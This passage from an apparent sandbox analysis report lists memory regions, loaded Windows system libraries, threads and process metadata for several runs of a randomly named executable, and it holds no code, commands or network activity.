mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7600 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7601 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7602 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7603 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7604 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7605 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7606 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7811 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7812 start_va = 0x870000 end_va = 0x9f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 7813 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 254 os_tid = 0x12a8 Thread: id = 280 os_tid = 0x7ac Process: id = "88" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x58b1b000" os_pid = "0x1094" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6869 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6870 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6871 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6872 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6873 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6874 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6875 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6876 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6877 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6878 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6879 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6880 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6881 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6882 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6883 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6884 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 7288 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 7289 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7290 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7291 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7292 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7293 start_va = 0x550000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 7294 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7295 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7296 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7297 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7298 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7299 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7300 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7301 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 7302 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 7303 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7612 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7613 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7614 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7615 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7616 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7617 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7618 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7619 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7620 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7621 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7622 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7623 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7624 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7625 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7626 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7627 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7628 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7629 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7814 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7815 start_va = 0x7d0000 end_va = 0x957fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 7816 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 255 os_tid = 0x13b0 Thread: id = 273 os_tid = 0xec4 Process: id = "89" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xb45d000" os_pid = "0x109c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6890 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6891 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6892 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6893 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6894 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6895 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6896 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6897 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6898 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6899 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6900 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6901 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6902 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6903 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6904 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6905 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 7323 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 7324 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7325 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7326 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7327 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7328 start_va = 0x5e0000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 7329 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7330 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7331 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7332 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7638 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7639 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7640 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7641 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 7642 start_va = 0x5e0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 7643 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 7644 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7645 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7646 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7647 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7648 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7649 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7650 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7651 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7652 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7653 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7654 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7655 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7656 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7657 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7658 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7659 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7660 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7661 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7817 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7818 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7819 start_va = 0x810000 end_va = 0x997fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 7820 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 256 os_tid = 0x12e0 Thread: id = 281 os_tid = 0x6ec Process: id = "90" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xb47c000" os_pid = "0x870" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6915 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6916 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = 